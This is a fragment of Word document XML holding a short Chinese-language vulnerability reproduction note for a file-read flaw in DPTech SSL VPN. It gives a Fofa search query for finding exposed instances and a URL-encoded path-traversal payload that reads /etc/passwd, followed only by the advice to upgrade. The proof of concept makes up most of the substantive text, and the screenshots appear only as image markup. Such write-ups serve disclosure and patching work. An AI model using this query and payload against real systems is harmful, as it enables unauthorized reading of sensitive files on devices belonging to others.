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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>杭州迪普科技股份有限公司DPTech VPN 文件读取漏洞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漏洞描述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杭州迪普科技股份有限公司（简称“迪普科技”） 以“让网络更简单、智能、安全”为使命，聚焦于网络安全及应用交付领域，是一家集研发、生产、销售于一体的高科技上市企业该系统存在文件读取漏洞,攻击者可利用该漏洞获取系统的敏感信息等.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漏洞复现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Fofa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title=="SSL VPN Service" &amp;&amp; header="Dptech" || cert="DPtechCa"</w:t>
      </w:r>
    </w:p>
    <w:p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80685" cy="2250440"/>
            <wp:effectExtent l="0" t="0" r="5715" b="508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2250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部分界面如下</w:t>
      </w:r>
    </w:p>
    <w:p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12105" cy="2655570"/>
            <wp:effectExtent l="0" t="0" r="13335" b="1143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2105" cy="2655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隐患url，验证如下</w:t>
      </w:r>
    </w:p>
    <w:p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/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd</w:t>
      </w:r>
    </w:p>
    <w:p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865" cy="3552825"/>
            <wp:effectExtent l="0" t="0" r="317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修复建议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1、升级到安全版本。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7A0509C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B7A0509C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VlNmU0MDY3ZjU0MTgxOGRiNjg4OTc5NWFkNGI1NmUifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="027D143D"/>
    <w:rsid w:val="158C3FC8"/>
    <w:rsid w:val="4478280C"/>
    <w:rsid w:val="73084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2023-11-14T13:04:15Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-14T13:06:04Z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7F6EA4446516466FA01A1EEFEBBDA1AF_12</vt:lpwstr>
  </property>
</Properties>
</file>